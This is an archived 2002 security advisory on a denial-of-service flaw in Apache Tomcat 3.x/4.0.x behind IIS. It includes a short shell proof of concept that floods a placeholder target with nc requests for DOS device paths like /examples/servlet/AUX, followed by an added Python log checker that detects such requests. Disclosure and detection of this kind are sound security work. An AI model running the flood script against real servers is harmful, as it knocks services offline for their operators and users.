[VulnWatch] Apache Tomcat 3.x and 4.0.x: Remote denial-of-service vulnerability

From: Olaf Schulz (olaf.schulz@t-systems.com)
Date: Fri Oct 11 2002 - 04:36:55 PDT

    -----BEGIN PGP SIGNED MESSAGE-----
    
    <Title:>
    Apache Tomcat: Remote denial-of-service vulnerability
    
    <Date:>
    2002-09-06
    
    <State:>
    2002-10-11
    
    <Vendor response:>
    Vendor contacted on 2002-09-06.
    Vendor has been verifying the problem since 2002-09-10.
    No news since then...
    
    <Operating Systems:>
    
    Microsoft Windows 2000
    Microsoft Windows NT may be affected as well.
    
    <Software:>
    Apache Tomcat 3.3
    Apache Tomcat 4.0.4
    All versions prior to 4.1.x may be affected as well.
    
    Apache Tomcat 4.1.10 (and probably higher) is not affected.
    
    <Attack:>
    A remote attacker can bring the servlet engine to a standstill.
    
    <Description:>
    In combination with Microsoft's IIS, Apache Tomcat is vulnerable to a
    denial-of-service attack.
    An attacker can crash the Tomcat engine with multiple (e.g. 1000)
    requests that contain DOS device names like AUX, LPT1, CON, PRN.
    
    Proof of concept code:
    When Tomcat is serving servlets and JSPs under /examples/servlet/,
    use:
    - - - - --------8<----------------------------
    #!/bin/sh
    for i in 1 2 3 4 5 6 7 8 9 0 ; do
      for j in 1 2 3 4 5 6 7 8 9 0 ; do
         for k in 1 2 3 4 5 6 7 8 9 0 ; do
            echo -e "GET /examples/servlet/AUX HTTP/1.0\n\n" | nc <target_ip> <target-port> >/dev/null 2>&1 &
         done
      done
    done
    - - - - --------8<----------------------------
    
    This attack works on a Microsoft IIS Web Server connecting the Tomcat
    engine via the ajp1.3 connector.
    Standalone Tomcat engines (connected via the http interface on port
    8080) are not vulnerable.
    
    <Risk:>
    Probability of an attack: HIGH
    Damage probability: MEDIUM-HIGH
    
    
    <Recommendation:>
    1) Do not use Apache software on Microsoft operating systems.
    
    2) When using Apache with IIS, enable the URLScan Filter to filter
    DOS device names from HTTP Requests.
    
    3) Update to Apache Tomcat 4.1.x
    
    Author: Olaf Schulz
            olaf.schulz@t-systems.com
            http://www.dcert.de
    
    -----BEGIN PGP SIGNATURE-----
    -----END PGP SIGNATURE-----
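
A log check a defender could run to spot the request pattern this advisory describes, added here as an example and not part of the original advisory. The log format, function names and sample lines are constructed assumptions, and the device list goes beyond the advisory's AUX, LPT1, CON and PRN to cover the other names Windows reserves.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Reserved DOS device names. The advisory names AUX, LPT1, CON and PRN; NUL,
# COM1-9 and LPT2-9 are added here because Windows reserves them the same way.
DEVICE_RE = re.compile(r"^(AUX|CON|PRN|NUL|COM[1-9]|LPT[1-9])$", re.IGNORECASE)

# Constructed log format (assumption): "<client-ip> <method> <uri> <status>"
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})$")


def device_segments(uri):
    """Return the decoded path segments of uri that name a DOS device."""
    path = unquote(urlsplit(uri).path)
    hits = []
    for segment in re.split(r"[/\\]", path):
        # Legacy Win32 name handling ignores an extension and trailing dots,
        # spaces or a colon, so "AUX.jsp", "aux." and "CON:" still match.
        base = segment.rstrip(" .:").split(".", 1)[0].rstrip(" ")
        if DEVICE_RE.match(base):
            hits.append(segment)
    return hits


def flag_clients(lines, threshold=3):
    """Count device-name requests per client; return those at/above threshold."""
    counts = Counter()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m and device_segments(m.group(3)):
            counts[m.group(1)] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample input, not taken from a real server.
SAMPLE_LOG = [
    "192.0.2.10 GET /examples/servlet/AUX 500",
    "192.0.2.10 GET /examples/servlet/aux.jsp 500",
    "192.0.2.10 GET /examples/servlet/%4cPT1 500",
    "192.0.2.10 GET /examples/servlet/HelloWorld 200",
    "198.51.100.7 GET /examples/servlet/console 200",
    "198.51.100.7 GET /docs/CON: 404",
]

if __name__ == "__main__":
    for ip, n in flag_clients(SAMPLE_LOG).items():
        print(f"{ip}: {n} requests naming a DOS device")
```

The same `device_segments` test can back a reject rule in front of the connector, which is the role the advisory gives to the URLScan filter.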
    


